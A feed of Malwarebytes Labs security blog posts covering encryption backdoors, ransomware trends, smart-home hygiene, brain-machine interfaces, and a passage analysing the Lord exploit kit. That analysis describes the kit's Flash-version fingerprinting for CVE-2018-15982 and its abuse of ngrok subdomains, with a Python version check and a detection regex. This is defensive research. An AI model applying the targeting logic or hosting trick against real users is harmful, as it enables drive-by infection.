Techie Feeds

Backdoors are a security vulnerability

Malwarebytes - Fri, 08/09/2019 - 16:10

Last month, US Attorney General William Barr resurrected a government appeal to technology companies: Provide law enforcement with an infallible, “secure” method to access, unscramble, and read encrypted data stored on devices and sent across secure messaging services.

Barr asked, in more accurate, yet unspoken terms, for technology companies to develop encryption backdoors to their own services and products. Refusing to endorse any single implementation strategy, the Attorney General instead put the responsibility on cybersecurity researchers and technologists.  

“We are confident that there are technical solutions that will allow lawful access to encrypted data and communications by law enforcement without materially weakening the security provided by encryption,” Attorney General Barr said.

Cybersecurity researchers, to put it lightly, disagreed. To many, the idea of installing backdoors into encryption is antithetical to encryption’s very purpose—security.

Matt Blaze, cybersecurity researcher and University of Pennsylvania Distributed Systems Lab director, pushed back against the Attorney General’s remarks.

“As someone who’s been working on securing the ‘net for going on three decades now, having to repeatedly engage with this ‘why can’t you just weaken the one tool you have that actually works’ nonsense is utterly exhausting,” Blaze wrote on Twitter. He continued:

“And yes, I understand why law enforcement wants this. They have real, important problems too, and a magic decryption wand would surely help them if one could exist. But so would time travel, teleportation, and invisibility cloaks. Let’s stick to the reality-based world.”

Blaze was joined by a chorus of other cybersecurity researchers online, including Johns Hopkins University associate professor Matthew Green, who said plainly: “there is no safe backdoor solution on the table.”

The problem with backdoors is known—any alternate channel devoted to access by one party will undoubtedly be discovered, accessed, and abused by another. Cybersecurity researchers have repeatedly argued for years that, when it comes to encryption technology, the risk of weakening the security of countless individuals is too high.

Encryption today

In 2014, Apple pushed privacy to a new standard. With the launch of its iOS 8 mobile operating system that year, no longer would the company be able to access the encrypted data stored on its consumer devices. If the company did not have the passcode to a device’s lock screen, it simply could not access the contents of the device.

“On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode,” the company said.

The same standard holds today for iOS devices, including the latest iPhone models. Data that lives on a device is encrypted by default, and any attempts to access that data require the device’s passcode. For Android devices, most users can choose to encrypt their locally-stored data, but the feature is not turned on by default.
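The protection described above rests on deriving the encryption key from the passcode itself. On real iOS hardware the passcode is also entangled with a device-unique key inside dedicated silicon, which is precisely why the key cannot be computed off-device; this simplified Python sketch shows only the passcode-stretching half of the idea:

```python
import hashlib
import os

def derive_key(passcode: str, salt: bytes) -> bytes:
    # Stretch the passcode into a 256-bit key; the high iteration
    # count makes each brute-force guess expensive.
    return hashlib.pbkdf2_hmac("sha256", passcode.encode(), salt, 100_000)

salt = os.urandom(16)
key = derive_key("123456", salt)

# A near-miss passcode yields a completely different key; without the
# passcode there is no practical way back to data encrypted under it.
assert derive_key("123457", salt) != key
```

Because the key only ever exists while the correct passcode is present, there is nothing stored on the device for the vendor to hand over.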

Within two years of the iOS 8 launch, Apple had a fight on its hands.

Following the 2015 terrorist shooting in San Bernardino, Apple hit an impasse with the FBI, which was investigating the attack. Apple said it was unable to access the messages sent on an iPhone 5C device that was owned by one of the attackers, and Apple also refused to build a version of its mobile operating system that would allow law enforcement to access the phone.

Though the FBI eventually relied on a third-party contractor to crack into the iPhone 5C, since then, numerous messaging apps for iOS and Android have provided users with end-to-end encryption that locks even third-party companies out from accessing sent messages and conversations.

Signal, WhatsApp, and iMessage all provide this feature to users.
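End-to-end encryption works because the two endpoints agree on a key that the relaying server never sees. A toy Diffie-Hellman exchange illustrates the principle; the parameters here are deliberately tiny for readability and bear no resemblance to Signal’s actual X3DH/Double Ratchet protocol:

```python
import hashlib
import secrets

# Toy finite-field Diffie-Hellman. Real systems use large standardized
# groups (e.g., RFC 3526 MODP) or elliptic curves -- never parameters
# this small.
P = 0xFFFFFFFB  # a small prime, for illustration only
G = 5

alice_secret = secrets.randbelow(P - 2) + 1
bob_secret = secrets.randbelow(P - 2) + 1

# Only these public values ever cross the server relaying the messages.
alice_public = pow(G, alice_secret, P)
bob_public = pow(G, bob_secret, P)

# Each side combines its own secret with the other's public value...
alice_shared = pow(bob_public, alice_secret, P)
bob_shared = pow(alice_public, bob_secret, P)
assert alice_shared == bob_shared  # ...and arrives at the same secret

message_key = hashlib.sha256(str(alice_shared).encode()).digest()
```

The server can forward `alice_public` and `bob_public` all day without ever learning `message_key`, which is what locks the company itself out of the conversation.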

Upset by their inability to access potentially vital evidence for criminal investigations, the federal government has, for years, pushed a campaign to convince tech companies to build backdoors that will, allegedly, only be used by law enforcement agencies.

The problem, cybersecurity researchers said, is that those backdoors do not stay reserved for their intended use.

Backdoor breakdown

In 1993, President Bill Clinton’s Administration proposed a technical plan to monitor Americans’ conversations: an encryption chipset called the “Clipper Chip,” to be built into telephones and other communications devices. Each chip escrowed a copy of its encryption key with the government so that, if the system worked properly, only law enforcement agencies would be able to listen in on certain phone calls.

But there were problems, as revealed by Blaze (the same cybersecurity researcher who criticized Attorney General Barr’s comments last month).  

In a lengthy analysis of the Clipper Chip system, Blaze found glaring vulnerabilities, including a way to circumvent the built-in backdoor entirely while still using the chip’s encryption.

By 1996, adoption of the Clipper Chip was abandoned.

Years later, cybersecurity researchers witnessed other backdoor failures, and not just in encryption.

In 2010, the cybersecurity expert Steven Bellovin—who helped Blaze on his Clipper Chip analysis—warned readers of a fiasco in Greece in 2005, in which a hacker took advantage of a mechanism that was supposed to only be used by police.

“In the most notorious incident of this type, a cell phone switch in Greece was hacked by an unknown party. The so-called ‘lawful intercept’ mechanisms in the switch—that is, the features designed to permit the police to wiretap calls easily—was abused by the attacker to monitor at least a hundred cell phones, up to and including the prime minister’s,” Bellovin wrote. “This attack would not have been possible if the vendor hadn’t written the lawful intercept code.”

In 2010, cybersecurity researcher Bruce Schneier placed blame on Google for suffering a breach by reported Chinese hackers, who were looking to see which Chinese agents were under surveillance by US intelligence.

According to Schneier, the Chinese hackers were able to access sensitive emails because of a fatal flaw by Google—the company put a backdoor into its email service.

“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts,” Schneier said. “This feature is what the Chinese hackers exploited to gain access.”

Interestingly, the insecurity of backdoors is not a problem reserved for the cybersecurity world.

In 2014, The Washington Post ran a story about where US travelers’ luggage goes once it gets checked into the airport. More than 10 years earlier, the Transportation Security Administration had convinced luggage makers to install a new kind of lock on consumer bags—one that could be unlocked through a physical backdoor, using one of seven master keys that only TSA agents were supposed to own. That Washington Post story, though, revealed a close-up photograph of all seven keys.

Within a year, that photograph of the keys had been analyzed and converted into 3D printing files that were quickly shared online. The keys had leaked, and the security of nearly every checked US luggage bag had been compromised. All it took was a single human error.

Worth the risk?

Attorney General Barr’s comments last month are part of a long-standing tradition in America, in which a representative of the Department of Justice (last year it was then-Deputy Attorney General Rod Rosenstein) makes a public appeal to technology companies, asking them to install backdoors as a means of preventing potential crime.

The arguments have lasted literal decades, invoking questions of the First Amendment, national security, and the right to privacy. That debate will continue, as it does today, but encryption may pick up a few surprising defenders along the way.

On July 23 on Twitter, the chief marketing officer of a company called SonicWall posted a link to a TechCrunch article about the Attorney General’s recent comments. The CMO commented on the piece:

“US attorney general #WilliamBarr says Americans should accept security risks of #encryption #backdoors”

Michael Hayden, the former director of the National Security Agency—the very agency responsible for mass surveillance around the world—replied:

“Not really. And I was the director of national security agency.”

The fight to install backdoors is a game of cat-and-mouse: The government will, for the most part, want its own way to decrypt data when investigating crimes, and technologists will push back on that idea, calling it dangerous and risky. But as more major companies take the same stand as Apple—designing and building systems that leave even the companies themselves unable to retrieve users’ data—the public might slowly warm up to the idea, and value, of truly secure encryption.

The post Backdoors are a security vulnerability appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs quarterly report finds ransomware’s gone rampant against businesses

Malwarebytes - Thu, 08/08/2019 - 14:00

Ransomware’s back—so much so that we created an entire report on it.

For 10 quarters, we’ve covered cybercrime tactics and techniques, examining a wide range of threats we saw lodged against consumers and businesses through our product telemetry, honeypots, and threat intelligence. We’ve looked at dangerous Trojans such as Emotet and TrickBot, the explosion and subsequent downfall of cryptomining, trends in Mac and Android malware, and everything in between.

But this quarter, we noticed one threat dominating the landscape so much that it deserved its own hard look over a longer period than a single quarter. Ransomware, which many researchers have noted took a long breather after its 2016 and 2017 heyday, is back in a big way—targeting businesses with fierce determination, custom code, and brute force.

Over the last year, we’ve witnessed an almost constant increase in business detections of ransomware, rising a shocking 365 percent from Q2 2018 to Q2 2019.

Therefore, this quarter, our Cybercrime Tactics and Techniques report is a full ransomware retrospective, looking at the top families causing the most damage for consumers, businesses, regions, countries, and even specific US states. We examine increases in attacks lodged against cities, healthcare organizations, and schools, as well as tactics for distribution that are most popular today. We also look at ransomware’s tactical shift from mass blanket campaigns against consumers to targeted attacks on organizations.

To dig into the full report, including our predictions for ransomware of the future, download the Cybercrime Tactics and Techniques: Ransomware Retrospective here.

The post Labs quarterly report finds ransomware’s gone rampant against businesses appeared first on Malwarebytes Labs.


8 ways to improve security on smart home devices

Malwarebytes - Wed, 08/07/2019 - 15:00

Every so often, a news story breaks that hackers have made their way into a smart home device and stolen personal data. Or that vulnerabilities in smart tech have been discovered that allow their producers (or other cybercriminals) to spy on customers. We’ve seen it play out over and over with smart home assistants and other Internet of Things (IoT) devices, yet sales numbers for these items continue to climb.

Let’s face it: No matter how often we warn about the security concerns with smart home devices, they do make life more convenient—or at the very least, are a lot of fun to play with. It’s pretty clear this technology isn’t going away. So how can those who’ve embraced smart home technology do so while staying as secure as possible?

Here are eight easy ways to tighten up security on smart home devices so that users are as protected as possible while using the new technologies they love.

1. Switch up your passwords

Most smart home devices ship with default passwords. Some companies require that you change the default password before integrating the technology into your home—but not all. The first thing users can do to ensure hackers can’t brute force their way into their smart home device is change up the password, and make it something that is unique to that device. Once a hacker finds out one password, they’ll try to use it on every other account.

A few ways to create less hackable passwords:

  • Making them longer than eight characters
  • Creating passwords that are unrelated to pets, kids, birthdays, or other obvious combinations
  • Using a password manager so you don’t have to remember 27 different passwords
  • Using a password generator to create random combinations
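The last suggestion can be sketched in a few lines of Python; the `secrets` module draws from the operating system’s cryptographically secure random source, which is what makes the output suitable for credentials:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    # secrets (not random) uses the OS CSPRNG, so the result is
    # unpredictable enough to serve as a real credential.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # different every run
```

Pair a generator like this with a password manager and every device gets its own unguessable, never-reused password.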

2. Enable two-step authentication

Many online sites and smart devices now allow users to opt into two-step authentication, which requires a second form of verification, such as a code sent to your phone, before allowing someone access to your account.

If you use a Chromecast or any other Google device, you can turn on this verification and receive email alerts. While you may be the only person to try logging into your account, it helps to know you’ll be notified if someone does try to hack in and get your information.
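The rotating six-digit codes used by most authenticator apps follow the TOTP standard (RFC 6238). A minimal sketch of how both your phone and the service derive the same code from a shared secret, for illustration only (real deployments should use a vetted library):

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, for_time=None, period=30, digits=6):
    """Time-based one-time password per RFC 6238 (HMAC-SHA1)."""
    key = base64.b32decode(secret_b32)
    counter = int((for_time if for_time is not None else time.time()) // period)
    mac = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    # Dynamic truncation: pick 4 bytes based on the last nibble.
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Phone and server share the secret once at enrollment; afterward both
# derive matching codes from the current 30-second window.
print(totp("JBSWY3DPEHPK3PXP"))
```

Because the code changes every 30 seconds and depends on a secret that never travels with the password, a stolen password alone is not enough to log in.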

3. Disable unused features

Smart home tech, like the Amazon Echo or Google Nest, has made headlines for invasively recording users without their knowledge or for shipping with undisclosed hardware, such as a microphone, that is later enabled. This makes trusting those devices implicitly a bit of a hazard.

While your voice assistant won’t be recording you all the time, it can be triggered by words used in a conversation between two people. Check your home assistant’s logs and delete your voice recordings if you find any you don’t approve of.

You can always turn off the voice control features on these devices. While their purpose is to respond to vocal commands, they can also be accessed through an app, remotely, or through a website instead.

4. Upgrade your devices

When was the last time you purchased smart tech for your home? If it was long enough ago that the device no longer receives compatible software updates, it might be time to upgrade.

Upgraded tech will always have new features and fewer malfunctions of once cutting-edge, now standard innovations, plus more advanced ways to secure the device that may not be available on earlier models.

Another benefit of upgrading is that there are far more players on the market today than there were just a couple of years ago. For example, many people use smart plugs to control their electricity usage, but not every brand considers security a top priority. Keep an eye on brands that have received positive reviews from tech and science publications. They’ll have fewer security issues than older models.

5. Check for software updates

Don’t worry if you don’t have the money for a big smart home upgrade right now. Many times, keeping software updated will do the trick—especially because security issues are most often fixed in periodic software updates, and not necessarily addressed in brand-new releases. Each new version of software released includes not only new functionality, but fixes to bugs and security patches.

These patches plug known vulnerabilities in the smart device that would otherwise allow hackers to drop malware or steal valuable data. To make sure your device’s software is always current, go into your settings and enable automatic software updates. If that’s not possible, set a reminder to check for updates yourself at least once per month.

6. Use a VPN

If you have concerns about the security of the Wi-Fi networks you use, you might consider a VPN. A virtual private network (VPN) creates an encrypted tunnel over any Internet connection, including public ones where you’re most at risk.

A VPN keeps your Internet protocol (IP) address from being discovered. This prevents hackers from pinpointing your location and makes your Internet activity far harder to trace.

Perhaps the most important benefit of using a VPN is that it creates secured, encrypted connections. No matter where you access Wi-Fi—say if you wanted to turn on the air-conditioning at home from the airport—a VPN keeps that traffic secure.

7. Monitor your data

Are your devices sending you reports on energy usage or the top songs you played at home this month? Are you storing or backing up smart home data on the cloud? If not, where does that data go and how is it secured?

Smart home devices may not have easy instructions for determining whether data produced from their usage is stored on the cloud or on private, corporate-facing servers. Rest assured that, whether it’s visible or not, smart device companies are collecting data, whether to improve their marketing efforts or simply to show their own value.

So how can users monitor how their data is collected, stored, and transmitted? Some devices may allow you to back up info to the cloud in settings. If so, you should create strong passwords with two-factor authentication in order to access that data and protect it from hackers. If not, you might need to dig through a device’s EULA or even contact the company to find out how they store the data at rest and in transit, and whether that data is encrypted.

If you’d prefer not to let your smart tech back up information to the cloud, you can often manually turn this off in settings. The question still remains: What happens to your data if it’s not in the cloud? That’s where poking around the company’s website or calling them to learn how personal information is stored can hopefully calm your fears.

8. Limit smart home device usage

The only way to guarantee your privacy and security at home is to avoid using devices that connect to the Internet—including your phone. Obviously, in today’s world, that’s a difficult task. Therefore, the second-best option is to consider which devices are absolutely necessary for work, pleasure, and convenience, and slim down the list of smart-enabled devices.

Perhaps it makes sense for an energy-conscious person to use a Nest device to regulate temperatures, but do they need Internet-connected smoke detectors? Maybe some folks couldn’t live without streaming, but could get by using a traditional key over a smart lock.

There’s no such thing as 100 percent protection from cybercrime—even if you don’t use the Internet. So if you want to embrace the wonders of smart home technology, be sure you’re smart about how and when you use it.

The post 8 ways to improve security on smart home devices appeared first on Malwarebytes Labs.


A week in security (July 29 – August 4)

Malwarebytes - Mon, 08/05/2019 - 15:44

Last week on Malwarebytes Labs we discussed the security and privacy changes in Android Q, how to get your Equifax money and stay safe doing it, and we looked at the strategy of getting a board of directors to invest in government cybersecurity. We also reviewed how a Capital One breach exposed over 100 million credit card applications, analyzed the exploit kit activity in the summer of 2019, and warned users about a QR code scam that can clean out your bank account.

The busy week in security continued with looks at Magecart and others intensifying web skimming, ATM attacks and fraud, and an examination of the Lord Exploit Kit.

Other cybersecurity news
  • The Georgia State Patrol was reportedly the target of a July 26 ransomware attack that has necessitated the precautionary shutdown of its servers and network. (Source: SC Magazine)
  • Houston County Schools in Alabama delayed the school year’s opening scheduled for August 1st due to a malware attack. (Source: Security Affairs)
  • Over 95% of the 1,600 vulnerabilities discovered by Google’s Project Zero were fixed within 90 days. (Source: Techspot)
  • Researchers who discovered several severe vulnerabilities now uncovered two more flaws that could allow attackers to hack WPA3 protected WiFi passwords. (Source: The Hacker News)
  • Germany’s data protection commissioner investigates revelations that Google contract-workers were listening to recordings made via smart speakers. (Source: The Register)
  • Experts tend to recommend anti-malware protection for all mobile device users and platforms, but 47% of Android anti-malware apps are flawed. (Source: DarkReading)
  • Many companies don’t know the depth of their IoT-related risk exposure. (Source: Help Net Security)
  • Apple’s Siri follows Amazon Alexa and Google Home in facing backlash for its data retention policies. (Source: Threatpost)
  • There has been a 92% increase in the total number of vulnerabilities reported in the last year, while the average payout per vulnerability increased this year by 83%. (Source: InfoSecurity magazine)
  • Multiple German companies were off to a rough start last week when a phishing campaign pushing a data-wiping malware dubbed GermanWiper targeted them and asked for a ransom. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (July 29 – August 4) appeared first on Malwarebytes Labs.


How brain-machine interface (BMI) technology could create an Internet of Thoughts

Malwarebytes - Mon, 08/05/2019 - 15:00

She plugged the extension for car transportation in the brain-machine interface connectors at the right side of her head, and off she went. The traffic was relatively slow, so there was no need to stop working. She answered a few more emails, then unplugged her work extension. Weekend mode could now be initiated. How about we play a game? her AI BrainPal companion, Phoenix, suggested. Or would you rather sit back and enjoy the ride?

Too futuristic? A Scalzi rip-off? Sci-fi that’s really more of a fantasy? Sure, it’s not technology that’s ready to ship, but driving a car while writing emails or playing video games—all while being physically paralyzed—is a future not-too-far-off. And no, we’re not talking about self-driving cars.

Brain-machine interface (BMI) technology is a field in which dedicated, big-name players are looking to develop a wide variety of applications for establishing a direct communication pathway between the brain (wired or enhanced) and an external device. Some of these players are primarily interested in healthcare-centric implementations, such as enabling paralyzed humans to use a computer, but for others, improving the lives of the disabled is simply a short-term goal on the road to much broader and more far-reaching accomplishments.

One such application of BMI, for example, is the development of a Human Brain/Cloud Interface (B/CI), which would enable people to directly access information from the Internet, store their learnings on the cloud, and work together with other connected brains, whether they are human or artificial. B/CI, often referred to as the Internet of Thoughts, imagines a world where instant access to information is possible without the use of external machinery, such as desktop computers or Internet cables. Search and retrieval of information will be initiated by thought patterns alone.

So exactly how does brain-machine interface technology work? And how far off are we from seeing it applied in the real world? We take a look at where the technology stands today, our top concerns—both for security and ethical reasons—and how BMI could be implemented for optimal results in the future.

Brain-machine interface technology today

At some level, brain-machine interface technology already exists today.

For example, there are cochlear implants that take over the function of the ears for people who are deaf or hard of hearing. These implants stimulate the nerves that carry sound information to the brain, helping people process sound they’d otherwise be unable to hear. There are also several methods that allow mute or paralyzed people to communicate with others, although those methods are still crude and slow.

However, organizations are moving quickly to transform BMI technology from theoretical to practical. Many of the methods we’ll discuss below have already been tested on animals and are waiting for approval to be tested on humans.

One company working on technology to link the brain to a computer is Elon Musk’s startup Neuralink, which expects to be testing a system that feeds thousands of electrical probes into the human brain around 2020. Neuralink’s initial goal is to help people deal with brain and spinal cord injuries or congenital defects. Such a link could, for example, enable patients to use an exoskeleton. But the long-term goal is a brain-to-machine interface that could achieve a symbiosis of human and artificial intelligence.

Working from a different angle are companies like Intel, IBM, and Samsung. Intel is trying to mimic the functionality of a brain by using neuromorphic engineering. This means they are building machines that work in the same way a biological brain works. Where traditional computing works by running numbers through an optimized pipeline, neuromorphic hardware performs calculations using artificial “neurons” that communicate with each other.

Traditional and neuromorphic designs are two wildly different techniques, each optimized for different methods of computing. Neural networks, for example, excel at recognizing visual objects, so they would be better at facial recognition and image searches. Neuromorphic design is still in the research phase, but this and similar projects from competitors such as IBM and Samsung should break ground for eventual commoditization and commercial use. These projects might be able to provide a faster and more efficient interface between a real brain and a binary computer.

Using a technique called “neuralnanorobotics,” neuroscientists expect connections that are far more advanced to be possible within decades. While the technology is mainly being developed to facilitate accurate diagnoses and eventual cures for the hundreds of different conditions that affect the human brain, it also offers options in a more technological direction.

The human brain is an amazing computer

At a possible transmission speed of up to ∼6 × 10^16 bits per second, the human brain is able to relay an incredible amount of information extremely fast. To compare, that is 60,000 Terabits per second, or 7,500 Terabytes per second, which is far faster than the fastest stable long-distance Internet connection recorded to date (1.6 Terabits per second). This means that in our coveted brain-to-Cloud connection, the Internet would be the speed-limiting factor.
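The unit conversion behind that comparison can be checked in a couple of lines (the 6 × 10^16 bits-per-second figure is the researchers’ estimate, not a measured value):

```python
bits_per_second = 6e16                 # estimated brain transmission rate
terabits = bits_per_second / 1e12      # 60,000 Tbit/s
terabytes = terabits / 8               # 7,500 TB/s
record_link_tbit = 1.6                 # fastest long-distance link cited

# The brain estimate outpaces the record link by a factor of 37,500.
print(terabits, terabytes, terabits / record_link_tbit)
```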

However, it’s most likely that the devices we are going to need to transform one kind of data into another will determine the speed at which BMI technology operates.

Beyond speed, there are other limiting factors that create a technological mismatch when pairing brains and computers. Neuromorphic engineering aims to bridge the differences between the computers we are used to working with and biological brains: neuromorphic engineers build computers that resemble a more human-like brain by using a special type of chip. Of course, it is possible to mimic the functioning of the brain by using regular chips and special software, but this process is inefficient.

The main difference between logical and biological computers is in the number of possible connections. Simply put, if you want to match the thousands of possible connections that neurons can make, it takes a huge number of transistors. Enter: specially-crafted chips whose architecture resembles the human brain.

Yet, for all the brain’s marvels, speed, and thousands of neurons making connections and relaying information, we are human after all, which means those connections can also produce flawed outcomes.

Know that frustrating feeling when you see a familiar face you’ve passed by hundreds of times, but can’t remember their name? Or hear a tune you’ve hummed endlessly for weeks, but don’t remember the lyrics? The number of connections a neuron can make does not always lead directly to the right answer. Sometimes, we are distracted or overwrought, or we simply cannot retrieve known information from wherever it’s been stored.

What if you could put a computer to work at such a moment? Computers do not forget information unless you delete it—and even then, it can sometimes be found. Now add the cloud and Internet connectivity, and suddenly, you’ve got an eidetic memory. It’d be like being able to Google something instantaneously in your head.

Should humans be wired to machines?

As we have shown, researchers are following several paths to determine applications for connecting our brains to the digital world, and they are considering the strengths and weaknesses of each as they attempt to achieve a symbiotic relationship. Whether it’s an exoskeleton that allows a paralyzed person to walk, Artificial Intelligence-powered computers that can ramp up on speed and visual capabilities, or connecting our brains to the Internet and the Cloud for storing and sharing information, the applications for BMI technology are nearly endless.

I’m sure this research can be of great benefit to people with disabilities, enabling them to use appliances and devices more easily, move around more freely, or communicate more readily. And maybe one or more of these technologies could even bring relief to those suffering from mental health conditions or learning disabilities. In those cases, you will hear no argument from me, and I will applaud every step of progress made. But before I have my brain connected to the Internet, a lot of other requirements will have to be met.

For one, there are countless concerns about the ethical development of this technology. What is happening to the animals that are being tested? How would we determine the best way to move forward on testing humans? Is there a point of no return where once we hit a certain threshold, we lose control—and the computer or AI gains it? At which point do we stop and think: Okay, we know we can do this, but should we?

From a practical standpoint alone, there are some questions that need answering. For example, Bluetooth would be sufficient to control the medical applications, so why would we have to be hardwired to the Internet?

What is stopping brain-machine interface technology development today?

From where we are now in technology’s development, we see a few hurdles that will need to be jumped to move these techniques into a fully functional BMI. At a high level:

  • Progress needs to be made on developing smaller specialized computer chips that are capable of a multitude of connections. Remember, the first computers were the size of a whole room. Now, they fit in our pocket.
  • The research conducted in these fields will undoubtedly teach us more about the human brain, but there is so much we still don’t know. Will what we uncover about the brain be enough to successfully connect it to a machine? Or will what we don’t know hinder us or put us in danger in the end?
  • Approval from regulatory bodies like the FDA (Food and Drug Administration), lawmakers, and human rights organizations will be necessary to start testing on humans and expanding development into commercially viable products.

But there are more reasons that would stop me from using a BMI, even when the above points have been addressed:

  • Not everything you find on the Internet is true, so we would need some type of filter beyond search ranking to determine which information gets “downloaded” into people’s brains. How would we do so objectively? How could we simplify this without looking at a screen of search results, headlines, sources, and meta descriptions? Where does advertising come into play?
  • The combination of healthcare and cybersecurity has never been one that favors the security side. How will BMI integrate with hospital systems that use legacy software? What are the implications of someone actually hacking your brain?
  • Privacy will be a huge issue, since a cloud-connected brain could accidentally transmit information we’d rather keep to ourselves. I cannot control my thoughts, but I do like to control which ones I speak out loud, and which are published on the Internet.
  • The good old fear of the unknown, I will readily admit. We just don’t know what we don’t know. But who knows, maybe someday it will be as normal as having a smart phone.

What could stop us a few decades from now?

Let’s suppose we are able to work out all the high-level issues with privacy, security, filtering fact from fiction, and even learning all there is to know about the human brain. In a couple of decades, we might have BMI in a place where we can conceivably release it to the public. There would still be kinks to iron out before this technology is ready for mass adoption. They include:

  • The cost of development will weigh heavily on the first use cases. That means, quite simply, that the first people with access to BMI tech will likely be those with considerable wealth. With the gap between the haves and the have-nots already widening, how much further will civilization divide when the top 1 percent not only control the majority of money, land, and media on the planet, but also have super-powered brains? Only mass production will make this sort of technology available to a larger part of the population.
  • The early adopters would be equipped with a super power, for all intents and purposes. Imagine interacting with a person that actually has all of human knowledge readily available. What will this do to working relationships? Friendships, marriages, or families? Outside of the economic imbalance mentioned above, what sort of sociological impact will result from BMI being unleashed?
  • Physical dangers are inherent when we directly connect devices of any sort to our bodies, and especially to our fragile brains. What are the possible effects of a discharge of static electricity directly into our brain?

Security concerns

Given that the path to the Internet of Thoughts seems destined to include medical research, discoveries, and applications, we fear that security will be implemented as an afterthought, at best. Healthcare has struggled as an industry to keep up with cybersecurity, with hospital devices or computers often running legacy software or institutions leaking sensitive patient data on the open Internet.

Where we already see healthcare technologies with the capability to improve quality of life (or even save lives) hurried through the development process without properly implementing security best practices, we shiver at the prospect of inheriting these poor programming and implementation habits when we start creating connections between the brain and the Internet.

Consider the implications if cybercriminals could hack into a high-ranking official’s BMI because of unattended security vulnerabilities. One missed update could mean national security is compromised. And what might an infected BMI look like? Could criminals launch zombie-like attacks against communities, controlling people’s actions and words? Could they hold important information, like passwords or your child’s birthday, for ransom, locking you out of those memories forever if you don’t pay up? Could they extort celebrities or politicians for their private thoughts?

As a minor note and at the very least, I would certainly recommend using short-range connections like Bluetooth to develop medical applications for brain-machine interfaces. That might improve the chances of establishing a secure B/CI protocol for applications that require an Internet connection.

However, the main concern with BMI technology is not whether we’re capable of producing it, or even which applications of BMI deserve our attention. It’s that the Internet of Thoughts will become a dangerous and dark experiment that forever alters the way we humans communicate and interact. How can we be civil when our peers have access to our very thoughts—abstract or grim or judgmental or otherwise? What happens when those who cannot afford BMI attempt to compete with those that do? Will they simply get left behind?

When we connect our brain to a machine, are we even still human?

These are questions to consider as this fairly new technology gains traction. In the meantime, stay safe everyone!

The post How brain-machine interface (BMI) technology could create an Internet of Thoughts appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Say hello to Lord Exploit Kit

Malwarebytes - Fri, 08/02/2019 - 18:15

Just as we had wrapped up our summer review of exploit kits, a new player entered the scene. Lord EK, as it calls itself, was caught by Virus Bulletin’s Adrian Luca while replaying malvertising chains.

In this blog post, we do a quick review of this exploit kit based on what we have collected so far. Malwarebytes users were already protected against this attack.

Exploit kit or not?

Lately there has been a trend of what we call pseudo-exploit kits, where a threat actor essentially grabs a proof of concept for an Internet Explorer or Flash Player vulnerability and crafts a very basic page to load it. It is probably more accurate to describe these as drive-by download attacks, rather than exploit kits.

With an exploit kit we expect to see certain feature sets that include:

  • a landing page that fingerprints the machine to identify client side vulnerabilities
  • dynamic URI patterns and domain name rotation
  • one or more exploits for the browser or one of its plugins
  • logging of the victim’s IP address
  • a payload that may change over time and that may be geo-specific
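
As a rough illustration of how defenders might use this checklist, the traits can be folded into a simple triage score for a captured web session. This is a hypothetical sketch; the field names below are invented, not part of any real tool:

```python
# Hypothetical triage sketch: score a captured web session against the
# exploit kit checklist above. Field names are invented for illustration.
EK_FEATURES = [
    "fingerprints_client",  # landing page probes the browser/plugins
    "dynamic_uris",         # rotating URI patterns and domain names
    "serves_exploit",       # browser or plugin exploit delivered
    "logs_victim_ip",       # victim IP recorded server-side
    "rotating_payload",     # payload changes over time or by geo
]

def ek_score(session):
    """Count how many exploit kit traits a session exhibits (0-5)."""
    return sum(1 for feature in EK_FEATURES if session.get(feature))

print(ek_score({"fingerprints_client": True, "serves_exploit": True}))  # → 2
```

A session matching most of these traits is a much stronger exploit kit candidate than a bare drive-by download page, which typically exhibits only one or two.
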

Quick glance at Lord EK

The first tweet from @adrian__luca about Lord EK came out on the morning of August 1 and shows some interesting elements. It is part of a malvertising chain via the PopCash ad network and uses a compromised site to redirect to a landing page.

We can see a very rudimentary landing page in clear text, with a comment at the top left by its author that says: <!-- Lord EK - Landing page -->. By the time we checked it, it had been obfuscated but remained essentially the same.

There is a function that checks for the presence and version of the Flash Player, which will ultimately be used to push CVE-2018-15982. The second part of the landing page collects information that includes the Flash version and other network attributes about the victim.
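
To illustrate the kind of version gate such a landing page performs, here is a sketch translated to Python. The patched build number (32.0.0.101, per Adobe’s APSB18-42 advisory) and the comma-separated version format are assumptions worth verifying:

```python
# A sketch of the version check an EK landing page performs, translated
# to Python for illustration. The patched build comes from Adobe's
# APSB18-42 advisory; the comma-separated format mirrors how Flash
# reports its version via ActiveX. Treat both as assumptions.
PATCHED = (32, 0, 0, 101)  # first Flash Player build fixing CVE-2018-15982

def is_vulnerable(version_string):
    """Return True if the reported Flash version predates the fix."""
    parts = tuple(int(p) for p in version_string.split(","))
    return parts < PATCHED

print(is_vulnerable("31,0,0,153"))  # → True
print(is_vulnerable("32,0,0,101"))  # → False
```

The kit only bothers serving its exploit when this check passes, which is why patched visitors simply see nothing happen.
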

Interesting URI patterns

One thing we immediately noticed was how the exploit kit’s URLs were unusual. We see the threat actor is using the ngrok service to craft custom hostnames (we informed ngrok of this abuse of their service by filing a report).

This is rather unusual, at least from what we have observed with exploit kits in recent history. As per ngrok’s documentation, it exposes a local server to the public Internet. The free version of ngrok generates random subdomains, which is almost perfect (and reminds us of domain shadowing) for the exploit kit author.
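
For defenders sifting proxy logs, free-tier ngrok hostnames can be flagged with a simple pattern. This is a hypothetical triage helper; the exact subdomain format ngrok generates is an assumption, so tune the pattern to what you actually observe:

```python
import re

# Hypothetical triage helper for proxy logs: flag free-tier ngrok
# hostnames. The pattern assumes the short random, hex-like subdomains
# ngrok generated at the time; adjust it to your own observations.
NGROK_RE = re.compile(r"^[0-9a-f]{8,12}\.ngrok\.io$", re.IGNORECASE)

def flag_ngrok_hosts(hostnames):
    """Return the hostnames that look like free-tier ngrok tunnels."""
    return [h for h in hostnames if NGROK_RE.match(h)]

print(flag_ngrok_hosts(["deadbeef01.ngrok.io", "www.example.com"]))
# → ['deadbeef01.ngrok.io']
```

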